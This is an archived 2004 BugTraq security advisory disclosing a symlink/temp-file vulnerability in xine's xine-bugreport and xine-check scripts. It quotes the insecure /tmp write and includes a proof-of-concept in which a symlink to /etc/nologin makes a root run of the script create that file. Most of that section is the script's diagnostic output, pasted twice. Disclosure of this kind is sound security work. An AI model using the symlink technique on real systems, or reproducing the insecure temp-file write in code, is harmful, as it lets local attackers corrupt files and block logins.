BugTraq
xine-check/xine-bugreport symlink vulnerability. Mar 20 2004 10:09PM
Shaun Colley (shaunige yahoo co uk)
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Product: xine-bugreport/xine-check scripts.
http://xinehq.de/

Versions: xine-bugreport && xine-check
(they are the same script, but 2
copies exist in a system with different
names)
Bug: Symlink bug / tmpfile bug.
Impact: Attacker's can write to arbitrary files,
corrupt sensitive system files, and in
theory elevate privileges (unlikely).
Risk: Low/Medium
Date: March 19, 2004
Author: Shaun Colley
Email: shaunige yahoo co uk
WWW: http://www.nettwerked.co.uk

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Introduction
#############

"xine is a free multimedia player. It plays back CDs,
DVDs, and VCDs. It also decodes multimedia files like
AVI, MOV, WMV, and MP3 from local disk drives, and
displays multimedia streamed over the Internet. It
interprets many of the most common multimedia formats
available - and some of the most uncommon formats,
too." - extracted from <http://www.xinehq.de>, xine
project site.

Due to the ongoing, and sometimes experimental
addition of features added to xine, a script (*there
is two copies of the script: /usr/bin/xine-bugreport
and /usr/bin/xine-check - they are *exactly* the
same*) is included in xine distributions to allow a
user to possibly remedy a problem, or report a bug if
their problem could not be solved. However, in the
bug-reporting code, the bug report email is dumped to
a file in the /tmp directory for a user to use later
or send manually - this file is written in a insecure
manner, presenting a symlink vulnerability.

Details
########

In the section of the xine-bugreport/xine-check script
which assembles a bug report email, a symlink
vulnerability exists due to an insecure file write of
the finished bug report email template. This may
allow an attacker to write to/corrupt sensitive system
files, and in theory elevate privileges, although
unlikely.

The bug occurs in the following code fragment:

--- xine-bugreport / xine-check frag ---
[...]

bugreport=/tmp/xine-bugreport

[...]

add ""
add "additional description:"
add "----------------------"
add ""
add "PUT YOUR DESCRIPTION HERE"
add "(please replace these two lines by your complete
problem description)"
add ""
add ""
add "system info, as found by xine-check:"
add "-----------------------------------"
cat "$logfile" >>$bugreport # no file check performed

[...]
--- EOF

As can be seen, no file checks take place before the
script (xine-check/xine-bugreport) 'cats' the bug
report template into the file defined in the
$bugreport variable, /tmp/xine-bugreport.

The xine-check/xine-bugreport script has the following
structure:

- Check xine-related configuration
- Suggest hints to fix any problems which might occur
- Ask the user if the hints fixed the problem
- If it did not, ask the user what type of problem
they
are having
- If the user chooses the "something else" option
(option 8), the bug report section of the script
starts. - this is one place where the vulnerability
exists.
- Also, if other options were picked as the type of
problem, choosing various things will allow a user to
report the problem as a bug.
Due to this insecure method of handling files, a
symlink bug presents itself, allowing an attacker to
write to/corrupt files with the permissions of the
invoking user of the xine-bugreport/xine-check script.
Exploitation is trivial. Details are presented
below.

Exploitation
#############

Below is an example exploitation scenario which I
actually carried out on my system.

--- attack ---
[shaun@localhost shaun]$ ls -al /etc/nologin
ls: /etc/nologin: No such file or directory
[shaun@localhost shaun]$ ln -s /etc/nologin
/tmp/xine-bugreport

[...]

[root@localhost bin]# xine-bugreport
Please be patient, this script may take a while to
run...
logging to /tmp/xine-check.log...
[OUCH!!] You're running me with root permissions?
You should definitely run xine as normal
user, not root. Running it as
root will expose you to some severe security
issues.
This script should run as the same user that
you would use to run
xine. If you run me as root (as you currently
are), I cannot check
if your real-life user has sufficient
permissions...
Unless you want to recheck something with
root permissions, you should
abort me now (press Ctrl-C) and run me from
your usual account.
press <enter> to continue...

[ good ] you're using Linux, doing specific tests

[ good ] looks like you have a /proc filesystem
mounted.

[ good ] You seem to have a reasonable kernel version
(2.4.19-16mdk)
[ good ] intel compatible processor, checking MTRR
support
[ good ] you have MTRR support and there are some
ranges set.
[ good ] found the player at /usr/bin/xine
[ good ] /usr/bin/xine is in your PATH
[ hint ] No xine-config found. Assuming xine from RPMs
The xine-config script can be used to
deternime some file locations
used by xine-lib, but you don't have such a
script on your system.
However, it looks like you installed xine
from the RedHat packages.
So I'll just guess that you are using the
standard locations.
If you want me to be sure about those file
locations, you can install
the 'xine-lib-devel' package (or
'xine-devel', depend on what packages
you're using, which contains xine-config.
However, this package is
not really needed to run xine...
press <enter> to continue...
[ good ] plugin directory /usr/lib/xine/plugins
exists.
[ good ] found input plugins
[ good ] found demux plugins
[ good ] found decoder plugins
[ good ] found video_out plugins
[ good ] found audio_out plugins
[ good ] skin directory /usr/share/xine/skins exists.
[ good ] found logo in /usr/share/xine/skins
[ good ] I even found some skins.
[ good ] /dev/cdrom points to
/dev/cdroms/../ide/host0/bus1/target1/lun0/cd
[ hint ] /dev/dvd is /dev/dvd, not a DVD device
/dev/dvd is the default device that xine uses
for playing DVDs.
You could make your life easier by creating a
symlink named /dev/dvd
pointing to your DVD device (something like
/dev/scd0 or /dev/hdc).
If your DVD-ROM device is /dev/hdb (slave
ATAPI device on primary bus),
rm /dev/dvd
ln -s hdb /dev/dvd
typed as root will give you the symlink.
Alternatively, you can configure xine to use
the real device directly,
using the setup dialog within xine, but I
can't check your DMA
settings in that case...
press <enter> to continue...
[ good ] found xvinfo: X-Video Extension version 2.2
[ hint ] Your X server doesn't support YUV overlays.
That means xine will have to to color space
transformation and scaling
in software, which is quite CPU intensive.
Maybe upgrading your
X server will help here.
If you have an ATI card, you'll find
accelerated X servers on
http://www.linuxvideo.org/gatos/
press <enter> to continue...
[ hint ] Your X server doesn't support packed YUV
overlays.
That means xine will have to to color space
transformation and scaling
in software, which is quite CPU intensive.
Maybe upgrading your
X server will help here.
If you have an ATI card, you'll find
accelerated X servers on
http://www.linuxvideo.org/gatos/
press <enter> to continue...
[ hint ] Your X server doesn't have any XVideo
support...
XVideo is an X server extension introduced by
XFree86 4.x. This
extension provides access to hardware
accelerated color space
conversion and scaling, which gives a great
performance boost.
If you have a fast (>1GHz) machine, you may
be able to watch all
kinds of video, anyway. You will waste lots
of CPU cycles, though...
press <enter> to continue...

Could you solve your xine problems using the previous
hints? (y/n)?
'pardon?? neither yes nor no? assuming no...

What kind of trouble does xine cause for you?

1) plays audio, but no video
2) plays video, but no audio
3) audio is interrupted and/or crackling
4) audio and video are out of sync
5) can't play DVDs
6) xine hangs instead of playing anything
7) xine doesn't start
8) something else
[root@localhost bin]# xine-bugreport
Please be patient, this script may take a while to
run...
logging to /tmp/xine-check.log...
[OUCH!!] You're running me with root permissions?
You should definitely run xine as normal
user, not root. Running it as
root will expose you to some severe security
issues.
This script should run as the same user that
you would use to run
xine. If you run me as root (as you currently
are), I cannot check
if your real-life user has sufficient
permissions...
Unless you want to recheck something with
root permissions, you should
abort me now (press Ctrl-C) and run me from
your usual account.
press <enter> to continue...

[ good ] you're using Linux, doing specific tests
[ good ] looks like you have a /proc filesystem
mounted.
[ good ] You seem to have a reasonable kernel version
(2.4.19-16mdk)
[ good ] intel compatible processor, checking MTRR
support
[ good ] you have MTRR support and there are some
ranges set.
[ good ] found the player at /usr/bin/xine
[ good ] /usr/bin/xine is in your PATH
[ hint ] No xine-config found. Assuming xine from RPMs
The xine-config script can be used to
deternime some file locations
used by xine-lib, but you don't have such a
script on your system.
However, it looks like you installed xine
from the RedHat packages.
So I'll just guess that you are using the
standard locations.
If you want me to be sure about those file
locations, you can install
the 'xine-lib-devel' package (or
'xine-devel', depend on what packages
you're using, which contains xine-config.
However, this package is
not really needed to run xine...
press <enter> to continue...

[ good ] plugin directory /usr/lib/xine/plugins
exists.
[ good ] found input plugins
[ good ] found demux plugins
[ good ] found decoder plugins
[ good ] found video_out plugins
[ good ] found audio_out plugins
[ good ] skin directory /usr/share/xine/skins exists.
[ good ] found logo in /usr/share/xine/skins
[ good ] I even found some skins.
[ good ] /dev/cdrom points to
/dev/cdroms/../ide/host0/bus1/target1/lun0/cd
[ hint ] /dev/dvd is /dev/dvd, not a DVD device
/dev/dvd is the default device that xine uses
for playing DVDs.
You could make your life easier by creating a
symlink named /dev/dvd
pointing to your DVD device (something like
/dev/scd0 or /dev/hdc).
If your DVD-ROM device is /dev/hdb (slave
ATAPI device on primary bus),
rm /dev/dvd
ln -s hdb /dev/dvd
typed as root will give you the symlink.
Alternatively, you can configure xine to use
the real device directly,
using the setup dialog within xine, but I
can't check your DMA
settings in that case...
press <enter> to continue...

[ good ] found xvinfo: X-Video Extension version 2.2
[ hint ] Your X server doesn't support YUV overlays.
That means xine will have to to color space
transformation and scaling
in software, which is quite CPU intensive.
Maybe upgrading your
X server will help here.
If you have an ATI card, you'll find
accelerated X servers on
http://www.linuxvideo.org/gatos/
press <enter> to continue...

[ hint ] Your X server doesn't support packed YUV
overlays.
That means xine will have to to color space
transformation and scaling
in software, which is quite CPU intensive.
Maybe upgrading your
X server will help here.
If you have an ATI card, you'll find
accelerated X servers on
http://www.linuxvideo.org/gatos/
press <enter> to continue...

[ hint ] Your X server doesn't have any XVideo
support...
XVideo is an X server extension introduced by
XFree86 4.x. This
extension provides access to hardware
accelerated color space
conversion and scaling, which gives a great
performance boost.
If you have a fast (>1GHz) machine, you may
be able to watch all
kinds of video, anyway. You will waste lots
of CPU cycles, though...
press <enter> to continue...

Could you solve your xine problems using the previous
hints? (y/n)?
n

What kind of trouble does xine cause for you?

1) plays audio, but no video
2) plays video, but no audio
3) audio is interrupted and/or crackling
4) audio and video are out of sync
5) can't play DVDs
6) xine hangs instead of playing anything
7) xine doesn't start
8) something else
please select (1..8): 8
please describe your xine problem briefly in _one_
line ( < 65 characters):
hello world

You should include a _complete_ copy of xine's output
in your bug report.
Note, however, that there is a 40K limit on messages
sent to the mailing list,
So you should strip down the parts that repeat over
and over,
if there are any.
You can either copy&paste this output from the
terminal where you ran xine,
or you can collect xine's output in a file named
/tmp/xine.out, using
this command:
xine >/tmp/xine.out 2>&1
(assuming you have a Bourne compatible shell, like
bash, for example)
If you need to add any parameters, you can do so...
This method is useful if you want to remove part of
the output...
Which method would you prefer?
1) copy&paste
2) logfile /tmp/xine.out
please select (1..2): 2

please press <return> when you have the log ready in
/tmp/xine.out

Hmmm, I could not read the /tmp/xine.out file.
Skipping this step.
You may add the output later, if this wasn't your
intention...
press <enter> to continue...

Okay. That's all I could guide you through...
I have assembled a skeleton for your bugreport in the
file

/tmp/xine-bugreport

You're strongly encouraged to add a detailed
description of your problem.
Just look for 'additional description', and fill it
in...

When you're finished, you can use your favourite
mailer to send it to
<xine-user (at) lists.sf (dot) net [email concealed]>. Please use this subject
line, or something similar:
Subject: bug: hello world
Alternatively, I could try to send the bug report for
you, using
/bin/mail -s "bug: hello world"
Please make sure to add the additional description
before saying "yes"!
Do you want me to do this now? (y/n)?
n
Thanks for your bugreport! Have a nice day!

[...]

[shaun@localhost shaun]$ ls -al /etc/nologin
-rw-r--r-- 1 root root 1756 Mar 20
21:56 /etc/nologin
[shaun@localhost shaun]$
---

Summary
########

The vulnerability can *ONLY* be exploited when the
user enters the part of the xine-check/xine-bugreport
script which allows them to send a bug report to Xine
developers. This is the part of the script in which
the insecure file handling is performed - thus
manifesting the symlink bug. While it may be unlikely
that these conditions occur, the results can be fairly
severe, as demonstrated above.

Credit
#######

This issue was discovered by shaun2k2 / Shaun Colley - <shaunige (at) yahoo.co (dot) uk [email concealed]>.

___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping"
your friends today! Download Messenger Now
http://uk.messenger.yahoo.com/download/index.html

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus